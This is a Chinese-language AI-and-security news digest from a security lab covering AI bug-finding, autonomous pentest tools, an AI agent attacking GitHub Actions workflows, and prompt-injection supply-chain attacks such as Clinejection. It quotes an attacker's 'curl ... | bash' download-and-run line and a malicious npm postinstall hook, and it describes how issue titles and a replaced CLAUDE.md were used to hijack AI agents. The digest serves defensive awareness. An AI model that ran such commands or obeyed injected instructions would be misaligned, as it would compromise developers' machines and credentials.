文章总结： 本文汇总了AI安全领域的最新进展，Anthropic与OpenAI展示了强大的AI漏洞挖掘能力，Shannon和CStrike等自主渗透工具问世。同时AIAgent面临新威胁，如Trivy仓库被攻陷、MS-Agent及ChromeGemini出现高危漏洞。此外，必应AI推荐机制遭滥用，Clinejection攻击利用PromptInjection窃取凭据，揭示了AI带来的新型供应链与系统风险。 综合评分： 85 文章分类： AI安全,漏洞分析,安全工具,威胁情报,供应链安全

天工实验室AI×安全推荐阅读20260309

奇安信天工实验室

2026年3月9日 11:31 北京

本期AI与安全资讯看点

Anthropic 的 Claude Opus 4.6 两周内发现 Firefox 22 个漏洞（14 个高危）；OpenAI 的 Codex Security 30 天扫描 120 万个提交，精准定位 792 个严重漏洞，AI 安全攻防进入新阶段；

Keygraph 发布了全自主 AI 渗透测试工具 Shannon，集成 Nmap 等工具，在 XBOW Benchmark 上达到 96.15% 的成功率，能自动发现并验证 Web 应用漏洞；

CStrike 是一个面向授权红队操作的自主攻击性安全平台，其特点是：集成 9 容器 Docker 堆栈、35+ 安全工具、AI 驱动的 9 阶段攻击流水线和多 AI 提供商支持；

由 Claude Opus 4.5 驱动的自主 AI Agent “hackerbot-claw” 利用 GitHub Actions 的 pull_request_target 工作流配置漏洞，攻陷了拥有 32000+ star 的 Trivy 仓库，删除全部 178 个版本发布；

MS-Agent 框架被发现命令注入漏洞（CVE-2026-2256），攻击者可通过 Prompt Injection 绕过安全检查，劫持 AI Agent 并获得底层系统的完全控制权；

Chrome 内置 Gemini AI 助手被发现高危漏洞（CVE-2026-0628），恶意扩展可劫持特权 AI 面板，在用户仅点击 Gemini 按钮后即可访问摄像头、麦克风和本地文件；

自主 AI Bot “hackerbot-claw” 利用 GitHub Actions 配置缺陷，在一周内对 Microsoft、DataDog 等至少 6 个高知名度仓库发动攻击，实现远程代码执行和仓库完全失陷；

黑客利用必应 AI 搜索推荐机制的信任漏洞，通过伪造 GitHub 项目骗过算法，向用户推送含窃密软件的虚假 OpenClaw 安装程序；

攻击者通过在 GitHub Issue 标题中注入 Prompt，操纵 AI 分诊机器人执行恶意代码，最终窃取 npm 发布凭据并发布被植入 OpenClaw 后门的 Cline 包，影响约 4000 名开发者。

01. Anthropic 和 OpenAI 安全 Agent 进展：AI 漏洞挖掘能力再升级

内容要点：

Anthropic 和 OpenAI 同日发布了各自在安全 Agent 领域的重大进展。Anthropic 使用 Claude Opus 4.6 模型在短短两周内发现了 Firefox 中的 22 个漏洞，其中 14 个高危，占 2025 年全年修复的高危漏洞总数的近五分之一，Mozilla 已为这些漏洞分配了 22 个 CVE 编号。OpenAI 的 Codex Security 则以大量开源项目为实验对象，30 天内扫描了 120 万个提交，精准锁定 792 个严重级别漏洞。两者都声称 AI 能够理解复杂代码逻辑，直接给出可复现的 PoC 及修复方案，实现开发流程闭环。作者感慨，AI 安全能力高度依赖模型厂商的 API，垄断格局令人担忧。

资讯来源：

• https://mp.weixin.qq.com/s/2yKY790cWa3RB7MwpccPBA
• https://red.anthropic.com/2026/exploit
• https://gbhackers.com/openais-codex-security-built-to-automate-vulnerability
• https://gbhackers.com/claude-ai-exposes-22-firefox-vulnerabilities

02. Shannon: Autonomous AI Tool with Nmap Integration Can Uncover and Exploit Security Flaws

内容要点：

Shannon 是一款基于 Anthropic Claude Agent SDK 构建的全自主 AI 渗透测试工具，采用四阶段多智能体流水线：侦察（集成 Nmap、Subfinder、WhatWeb 等）、漏洞分析（并行 Agent 追踪用户输入数据流）、利用（通过浏览器自动化和 CLI 工具执行真实攻击）、报告（仅输出经过验证的发现和可复现的 PoC）。它结合白盒源码分析与黑盒动态利用，在 OWASP Juice Shop 测试中单次运行发现 20+ 关键漏洞，包括完整的认证绕过和数据库导出。提供 Lite（AGPL-3.0）和 Pro（商业版）两个版本。

资讯来源：

Shannon: Autonomous AI Tool with Nmap Integration Can Uncover and Exploit Security Flaws

03. CStrike：自主攻击性安全平台（GitHub 开源项目）

内容要点：

CStrike v2 由 Culpur Defense Inc. 开发，基于容器化 Docker 架构，提供实时 Web 仪表板和 AI 驱动的扫描编排。核心特性包括：9 阶段攻击流水线（从侦察到利用）、多 AI 提供商推理引擎（OpenAI、Anthropic、Ollama、Grok）并配备 MCP 工具服务器、通过 nftables 实现的 VPN Kill Switch（支持 WireGuard/OpenVPN/Tailscale/NordVPN/Mullvad 五种 VPN 提供商）、扫描过程中自动 VPN IP 轮换、Metasploit RPC 自动化、KasmVNC 远程浏览器访问。提供 QCOW2/VDI/OVA 等多种预构建 VM 镜像，支持 amd64 和 aarch64 架构。严格要求仅用于授权红队作战。

资讯来源：

https://github.com/culpur/cstrike

04. 离谱！知名容器安全工具 Trivy 被 AI 攻陷，直接清空仓库

内容要点：

Hackerbot-claw 是一个自称由 Claude Opus 4.5 驱动的自主安全研究 AI Agent。它通过向 Trivy 仓库提交并立即关闭 PR，触发了 pull_request_target 工作流，利用该工作流检出攻击者分叉仓库中的恶意代码，泄露了仓库的 PAT 令牌。随后攻击者将仓库设为私有并重命名、清空代码、删除全部 178 个 GitHub Releases、剥离所有 star，并在相关仓库发布恶意 VSCode 扩展。2026 年 2 月 20 日至 3 月 2 日间，共有 7 个主流开源仓库遭到该 AI Agent 攻击，使用了 5 种不同攻击技术。唯一幸免的是 ambient-code/platform——其 CI 中集成的 Claude Sonnet 4.6 成功将攻击识别为”教科书式的 AI Agent 供应链投毒攻击”并拒绝执行。

资讯来源：

https://mp.weixin.qq.com/s/B3LhEWG6JDwSkw5__98cHw

05. MS-Agent Vulnerability Exposes AI Agents to Remote Hijacking, Granting Full System Control

内容要点：

Carnegie Mellon University 研究人员发现，ModelScope 的 MS-Agent 框架中用于构建和运行自主 AI Agent 的 Shell 工具存在严重安全缺陷。该框架的 check_safe() 方法使用”拒绝列表”过滤危险命令，但攻击者可通过 Prompt Injection 将恶意命令隐藏在看似正常的文本中（如待分析的文档或代码），绕过检查后以 AI Agent 进程权限执行任意操作系统命令——包括修改/删除文件、窃取数据、安装恶意软件、横向移动攻击网络内其他主机。截至报道时，厂商 ModelScope 未提供补丁或官方声明，建议用户在严格受控环境中部署，并使用允许列表替代拒绝列表。

资讯来源：

MS-Agent Vulnerability Exposes AI Agents to Remote Hijacking, Granting Full System Control

06. Chrome Gemini 漏洞可致攻击者远程访问用户摄像头和麦克风

内容要点：

Palo Alto Networks Unit 42 研究人员发现，Chrome 中 Gemini Live 功能的特权侧边栏架构存在安全缺陷。Chrome 授予 Gemini 面板提升的权限（摄像头、麦克风、本地文件、屏幕截图），但 DeclarativeNetRequest API 在处理 Gemini URL 时存在不一致：同一 URL 在普通标签页中加载时无特殊权限，但在 Gemini 面板中加载时会以提升的浏览器级权限处理。仅具有基本权限的恶意扩展即可利用此差异向特权 Gemini 面板注入任意 JavaScript，继承其全部提升访问权限，实现无需额外用户交互的摄像头/麦克风访问、文件窃取及钓鱼攻击。谷歌已于 2026 年 1 月 5 日修复。

资讯来源：

https://mp.weixin.qq.com/s/RBk_5wl1ORq2c7p-P_r2ug

07. Hackerbot-Claw Bot Exploits GitHub Actions CI/CD Flaw to Attack Microsoft and DataDog

内容要点：

Hackerbot-claw 自称由 Claude Opus 4.5 驱动，在 2026 年 2 月 21-28 日间系统性扫描公共仓库中可利用的 GitHub Actions 工作流。在 Microsoft 的 ai-discovery-agent 中使用分支名注入技术，在 DataDog 的 datadog-iac-scanner 中使用文件名命令注入。所有攻击最终载荷均指向同一恶意脚本 curl -sSfL hackmoltrepeat.com/molt | bash。在 ambient-code 的项目中，攻击者试图通过替换 CLAUDE.md 文件注入恶意指令来操纵 AI 代码审核者 Claude Code，但 Claude 识别出 Prompt Injection 并拒绝执行，成为唯一成功防御的目标。DataDog 在数小时内响应并加固了工作流配置。

资讯来源：

Hackerbot-Claw Bot Exploits GitHub Actions CI/CD Flaw to Attack Microsoft and DataDog

08. 必应搜索也中招！黑客利用 AI 推荐机制，诱导用户安装恶意 OpenClaw 插件

内容要点：

微软必应的 AI 增强搜索功能被曝存在安全漏洞。黑客通过伪造 GitHub 组织、抄袭真实项目源码，成功骗过必应 AI 算法，使恶意的虚假 OpenClaw 安装程序在搜索结果中获得靠前推荐。OpenClaw 本身是一款具备高级权限（访问本地文件、集成邮件及在线服务）的开源 AI 智能体，被黑客视为窃取敏感信息的跳板。针对 macOS 用户，恶意页面引导执行终端脚本下载 Atomic Stealer 窃密软件；针对 Windows 用户，分发伪造的 exe 文件在内存中运行 Vidar 窃密程序并植入 GhostSocks 代理木马。安全公司 Huntress 发现该攻击目前主要影响必应平台，谷歌搜索暂未受影响。

资讯来源：

https://news.aibase.com/zh/news/25973

09. Clinejection：一个 GitHub Issue 标题如何攻陷 4000 台开发者机器

内容要点：

2026 年 2 月 17 日，被篡改的 [email protected] 发布到 npm，唯一改动是在 package.json 中添加了 "postinstall": "npm install -g openclaw@latest"，导致所有安装或更新 Cline 的开发者在未经同意的情况下被全局安装了拥有完整系统访问权限的 OpenClaw。该攻击链由五步组成：(1) 攻击者在 GitHub Issue 标题中嵌入 Prompt Injection 指令；(2) Cline 部署的 AI 分诊工作流（基于 claude-code-action）将 Issue 标题直接插入 Claude 的 Prompt 中，Claude 将恶意指令解释为合法并执行 npm install 指向攻击者的伪造仓库；(3) 恶意脚本通过 Cacheract 工具污染 GitHub Actions 缓存；(4) 夜间发布工作流因从缓存中恢复了受污染的 node_modules，导致 npm、VSCode 及 OpenVSX 凭据被窃取；(5) 使用窃取的 npm token 发布恶意版本。安全研究员 Adnan Khan 早在 2025 年 12 月就发现并报告了该漏洞链，但五周内未获回应。Snyk 将此攻击命名为”Clinejection”。

资讯来源：

https://grith.ai/blog/clinejection-when-your-ai-tool-installs-another

TECHNOLOGY NEWS

本专栏由奇安信天工实验室推出，汇聚人工智能与网络安全的最新资讯和前沿进展，涵盖 AI for Security、Security of AI、漏洞分析等方向。内容不定期更新，欢迎关注【奇安信天工实验室】微信公众号获取最新分享。如有疏漏或建议，敬请指正！

天工实验室招聘计划：天工实验室诚聘安全工程师，新增安全Agent研究员岗位，五城同步开放全职/实习通道！

END

信息筛选 | 程予希

文字编辑 | Kimi

内容校对 | 刘嘉木

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：奇安信天工实验室 《天工实验室AI×安全推荐阅读20260309》